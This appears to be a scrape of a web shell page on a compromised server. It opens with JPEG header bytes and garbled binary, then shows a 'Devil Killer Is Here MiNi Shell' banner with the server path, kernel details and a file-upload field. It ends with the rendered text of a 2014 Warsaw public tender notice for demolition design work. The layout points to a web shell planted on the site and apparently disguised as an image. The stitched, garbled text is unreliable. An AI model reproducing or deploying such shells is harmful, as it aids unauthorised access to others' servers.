JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140425/141914-N-2014.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentacji projektowej i kosztorysowej  na rozbiórkę budynku mieszkalnego znajdującego się na posesji przy ul. Rakowieckiej 2C w Warszawie oraz uzyskanie na jej podstawie pozwolenia na rozbiórkę w Urzędzie m.st. Warszawy.</b><br>
<b>Numer ogłoszenia: 141914 - 2014; data zamieszczenia: 25.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej i kosztorysowej  na rozbiórkę budynku mieszkalnego znajdującego się na posesji przy ul. Rakowieckiej 2C w Warszawie oraz uzyskanie na jej podstawie pozwolenia na rozbiórkę w Urzędzie m.st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opis przedmiotu zamówienia oraz warunki jego realizacji.
1.1.  Przedmiotem zamówienia jest opracowanie dokumentacji projektowej i kosztorysowej  na rozbiórkę budynku mieszkalnego znajdującego się na posesji przy ul. Rakowieckiej 2C w Warszawie oraz uzyskanie na jej podstawie pozwolenia na rozbiórkę w Urzędzie m.st. Warszawy.
            Opis prac do wykonania został określony w pkt. 3.3. siwz oraz w  § 1 istotnych 
            postanowień umowy, stanowiących Rozdział III SIWZ.
1.1.1. Budynek jest administrowany przez ZGN Mokotów i znajduje się na    
           terenie DOM Wiśniowa ul. Falęcka 10, Warszawa.

1.2.  Szczegółowe określenie zakresu prac projektowych i kosztorysowych, o których mowa w pkt 3.1. siwz zawierają założenia projektowe i kosztorysowe, stanowiące załącznik nr 3 do  III Rozdziału specyfikacji   istotnych warunków  zamówienia - istotnych postanowień umowy. 
               1.2.1. Przy opracowaniu projektu należy dążyć do minimalizacji kosztów robót 
                         wykonanych na podstawie projektu.    

1.3.  Przedmiot zamówienia obejmuje :  
1.3.1. Wykonanie Projektu budowlanego rozbiórki wraz z planem zagospodarowania placu budowy opracowanego w 5 egzemplarzach w wersji papierowej oraz w wersji elektronicznej z pełnymi obliczeniami i uzgodnieniami w skali 1: 50 z dokładnością przewidzianą dla projektów wykonawczych; rysunki detali należy wykonać w skali 1:20. Wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD, DVD), preferowany jest zapis w formacie z rozszerzeniem pdf.
1.3.1.1. Każdy projekt budowlany musi spełniać wymagania określone w rozporządzeniach: Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 462 z 2012 r.), oraz Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jedn. Dz.U. z 2013, nr 1129). 
1.3.1.2.Każdy egzemplarz projektu budowlanego rozbiórki powinien być skompletowany i trwale oprawiony.
W projekcie budowlanym rozbiórki należy umieścić informację BIOZ. 

1.4. Kosztorysy inwestorskie należy wykonać w 2-ch egzemplarzach w formie papierowej oraz w wersji elektronicznej (zaleca się, aby były wykonane za pomocą programu kosztorysowego NORMA). Wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD, DVD), preferowany jest zapis w formacie z rozszerzeniem ATH (NORMA). Kosztorys inwestorski musi być wykonany zgodnie z warunkami określonymi w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130 z 2004 r., poz. 1389). 
    1.4.1. Każdy egzemplarz kosztorysu inwestorskiego powinien być trwale oprawiony wraz z przedmiarem robót dla potrzeb sporządzenia kosztorysu inwestorskiego.
    1.4.2. Kosztorysy inwestorskie należy wykonać metodą szczegółową w oparciu o kosztorysowe normy nakładów rzeczowych określone w katalogach KNR lub KNR-W, a w przypadku braku odpowiednich pozycji w tych katalogach (lub możliwości zastosowania analogii do nich) można wykorzystać inne dostępne na rynku katalogi norm albo wykonać kalkulację indywidualną po zaakceptowaniu przez Zamawiającego tj. inspektora nadzoru i Kierownika DOM. 
    1.4.3. W kalkulacji szczegółowej cen jednostkowych należy przyjąć następujące ceny czynników produkcji oraz wskaźniki narzutów:
stawkę robocizny kosztorysowej R - jako średnią dla miasta Warszawy stawkę za jedną roboczogodzinę  w danej branży publikowaną  w wydawnictwach  SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej.
ceny jednostkowe materiałów M - jako średnie  wraz z kosztami zakupu ceny materiałów, publikowane w wydawnictwach SEKOCENBUD IMB wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej.
ceny jednostkowe pracy sprzętu S - jako średnie dla miasta Warszawy ceny pracy sprzętu, publikowane  w wydawnictwach  SEKOCENBUD IRS - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej, 
wskaźnik narzutu kosztów pośrednich Wkp - jako średni dla miasta Warszawy wskaźnik w danej branży publikowany w wydawnictwach  SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej. Koszty pośrednie Kp należy liczyć od  (R + S),
wskaźnik narzutu zysku Wz - jako średni dla miasta Warszawy wskaźnik w danej branży, publikowany w wydawnictwach   SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej
            Zysk Z należy liczyć od (R+S+Kp),

1.5. Dwa przedmiary robót - wykonać dwa komplety: przedmiary robót dla potrzeb sporządzenia kosztorysu inwestorskiego oraz przedmiary robót dla Wykonawcy dla wyceny ofertowej.
1.5.1. przedmiar robót dla potrzeb sporządzenia kosztorysu inwestorskiego wykonanego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130 z 2004 r., poz. 1389), w 2-ch egzemplarzach  oraz w wersji elektronicznej. Wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD, DVD), preferowany jest zapis w formacie z rozszerzeniem ATH lub KST (NORMA).  
Każdy egzemplarz przedmiaru powinien być trwale oprawiony wraz z kosztorysem inwestorskim.
1.5.2. przedmiar robót dla Wykonawcy wykonany zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jedn. Dz.U. z 2013, nr 1129), w 2 egz. oraz w wersji elektronicznej, wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD, DVD), preferowany jest zapis w formacie z rozszerzeniem ATH lub KST (NORMA).  
Każdy egzemplarz przedmiaru dla Wykonawcy powinien być trwale oprawiony.

1.6. Specyfikacja techniczna wykonania i odbioru robót budowlanych wykonana musi być   zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jedn. Dz.U. z 2013, nr 1129), w 2 egz. oraz w wersji elektronicznej, wersja elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD, DVD), preferowany jest zapis w formacie z rozszerzeniem doc.  
W  części  Specyfikacji  technicznej   wykonania   i   odbioru   robót budowlanych dotyczącej   sposobu   rozliczania  robót  należy  wpisać,  że  Zamawiający  będzie rozliczał roboty w oparciu o kosztorysy zamienne  sporządzone  w  oparciu 
 o   obmiar   rzeczywiście  wykonanych   robót  i  ceny  jednostkowe   z  kosztorysu ofertowego.  Płatności  następować  będą  po  bezusterkowym końcowym odbiorze 
całości robót.    

1.7. Informacja bioz.- Wykonawca projektu przedstawi konieczne informacje dla sporządzenia planu Bezpieczeństwa i Ochrony Zdrowia.

1.8 Jednostka projektowa - w ramach realizacji przedmiotu zamówienia, zobowiązuje się do uzyskania własnym kosztem i staraniem wszelkich niezbędnych dla prawidłowej realizacji przedmiotu umowy - materiałów ( np.  mapy z uzbrojeniem terenu),  uzgodnień do wykonania projektu oraz do uzyskania w imieniu Zamawiającego pozwolenia na rozbiórkę w Urzędzie m.st. Warszawy Dzielnicy Mokotów.

1.9. Jednostka projektowa zobowiązuje się do pełnienia bezpłatnie nadzoru autorskiego zgodnie z obowiązującymi w tym zakresie przepisami prawa w czasie wykonywania robót na podstawie dokumentacji, o której mowa w ust. 1.

1.10. Jednostka projektowa zobowiązuje się do wykonania dokumentacji projektowej rozbiórki zaopatrzonej w wykaz opracowań oraz zawierającej oświadczenia Wykonawcy, że:
 1.10.1.została opracowana zgodnie z zasadami współczesnej wiedzy technicznej,    obowiązującymi normami, aktualnymi przepisami techniczno - budowlanymi,
 1.10.2. spełnia wymogi przewidziane dla projektu wykonawczego, jest kompletna i nadaje się do realizacji,
 1.10.3. posiada uzgodnienia, o których mowa w pkt 3.6. siwz.

     1.11. Wykonawca zobowiązuje się do wykonania kosztorysów oraz przedmiarów robót    
             obejmujących pełen zakres robót niezbędny do realizacji zadania.

1.12.Dokumentacja nie może zawierać żadnych  materiałów reklamowych producentów 
         materiałów budowlanych itp. oraz żadnych reklam.

1.13.Wykonawca do każdego egzemplarza projektu dołączy otrzymaną od Zamawiającego, w 
         dni podpisania niniejszej umowy, mapę z wkreślonym przebiegiem projektowanych linii  
         rozgraniczających ul. Rakowieckiej i ul. Wiśniowej.
1.14. Jednostka projektowa zobowiązana jest do pełnienia bezpłatnie nadzoru autorskiego   
         zgodnie z obowiązującymi w tym zakresie przepisami Prawa w czasie wykonywania 
         robót na podstawie tej dokumentacji. 

1.15. Wykonawca jest zobowiązany do przeniesienia praw autorskich na Zamawiającego.

1.16. Czynności, o których mowa w pkt. 3.1. - 3.3. niniejszej specyfikacji mają być wykonane zgodnie z:
            1.16.1. warunkami wynikającymi z przepisów technicznych i prawa budowlanego, 
            1.16.2. wymogami wynikającymi z Polskich Norm, w sposób czytelny i jednoznaczny z  
                         podaniem legendy indywidualnych oznaczeń graficznych,
            1.16.3. zasadami rzetelnej wiedzy technicznej i sztuką budowlaną,
            1.16.4. założeniami projektowymi do wykonania dokumentacji   projektowo - 
                        kosztorysowej, stanowiącymi załącznik nr 3 do III Rozdziału specyfikacji 
                        istotnych warunków zamówienia - istotnych postanowień umowy,
            1.16.5. warunkami wynikającymi z Istotnych postanowień umowy, stanowiących
                        Rozdział III specyfikacji istotnych warunków zamówienia,
1.16.6.postanowieniami ustawy Prawo zamówień publicznych. 

1.17. Kosztorys oraz przedmiar  robót powinien obejmować pełen zakres robót niezbędny   
               do realizacji zamówienia. 

1.18.W przypadku wystąpienia wad ukrytych w dokumentacji, których nie ujawniono w    
             czasie jej odbioru, Jednostka Projektowa zobowiązana będzie nieodpłatnie 
             do naniesienia poprawek i uzupełnień w terminie 3-ch dni od daty zawiadomienia.

1.19.Dokumentacja projektowo-kosztorysowa nie może zawierać żadnych materiałów  
             reklamowych  producentów materiałów budowlanych itp. oraz żadnych innych reklam. 
                                                                                                
1.20. Wszelkie materiały pomocnicze organizujące pracę oraz dostęp do pomieszczeń 
         Wykonawca zobowiązany jest uzyskać własnym kosztem i staraniem.

1.21. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z późn. zm.).

1.22. Wycena ryczałtowa podana w ofercie musi być wykonana w oparciu o Środowiskowe Zasady Wyceny Prac Projektowych I.P.B., przy stawce nie wyższej niż 20,00 PLN-j.n.p. (bez podatku VAT) zgodnie z decyzją Zarządu Rady Koordynacyjnej Biur Projektów z dnia 06.11.2013r.

1.23. Szczegółowy zakres obowiązków Wykonawcy zawarty jest w § 1 istotnych postanowień umowy, które stanowią Rozdział III do niniejszej specyfikacji.
1.23.1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy o 
            ile  warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których
            nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne
            dla Zamawiającego. Zamawiający dopuszcza możliwość zmiany umowy w
            szczególności w następujących przypadkach:
a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
b) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej umowy;
c) zmiany zakresu rzeczowego i finansowego;
             d)  zmiany osób uczestniczących w realizacji Przedmiotu niniejszej umowy;
        e) zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania Przedmiotu 
            umowy;
            f) zmiany Podwykonawców w sytuacji, gdy z przyczyn, których nie można było 
                 przewidzieć w chwili zawarcia umowy, koniecznym będzie dla prawidłowego 
                 wykonania umowy posłużenie się przez Wykonawcę nowymi Podwykonawcami, 
                 którzy będą realizowali część lub cały zakres powierzony uprzednio innym 
                 Podwykonawcom. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy 
                 podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych
                 w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, 
                 o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać 
                 zamawiającemu, iż proponowany inny podwykonawca lub wykonawca 
                 samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie 
                 postępowania o udzielenie zamówienia;
 1.23.2. Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod rygorem
       nieważności.
 1.23.3. Wynagrodzenie ostateczne - ryczałt - za wykonany pełen zakres prac - będzie
              obejmować łącznie wynagrodzenie podstawowe, podatek VAT oraz uzyskane przez
           Wykonawcę własnym kosztem i staraniem wszelkie niezbędne materiały, uzgodnienia.

1.24. Wymagania dotyczące gwarancji : 
      Zamawiający wymaga udzielenia gwarancji na wykonaną dokumentację projektową i kosztorysową do czasu wygaśnięcia odpowiedzialności Wykonawcy robót z tytułu gwarancji i rękojmi na roboty wykonane na podstawie opracowanej dokumentacji. Warunki gwarancji zawierają Istotne postanowienia umowy stanowiące Rozdział III specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt  6 ustawy zamówień z dnia 29 stycznia 2004r. Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 95.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
         Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:
2.Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej 3 usługi polegające na wykonaniu dokumentacji projektowej i kosztorysowej odpowiadającej przedmiotowi zamówienia,  o wartości nie mniejszej niż 20.000,00 zł brutto każda. 
Spełnienie ww  warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu wykonanych głównych usług, określonych w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 4 do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.6. SIWZ  potwierdzających, że wymienione w nim usługi zostały wykonane w sposób należyty lub są wykonywane należycie.
3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w szczególności:
-zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację wskazującą, który konkretny zasób jest udostępniany. W przypadku udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

-sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia.

-charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem. 

-zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,


Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.3A. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  
4.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            4.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi 
do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
         Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:
2.Wykonawca musi wykazać, że dysponuje osobami, które będą wykonywać dokumentację projektową i kosztorysową, posiadającymi kwalifikacje zawodowe, doświadczenie i stosowne uprawnienia budowlane do projektowania bez ograniczeń w specjalności ogólnobudowlanej, właściwej do wykonania przedmiotu zamówienia lub odpowiadające ww. w przypadku uprawnień wydanych przed dniem 30.12.1994 r. oraz  aktualne zaświadczenia o wpisaniu na listę członków właściwej Izby Samorządu Zawodowego. 
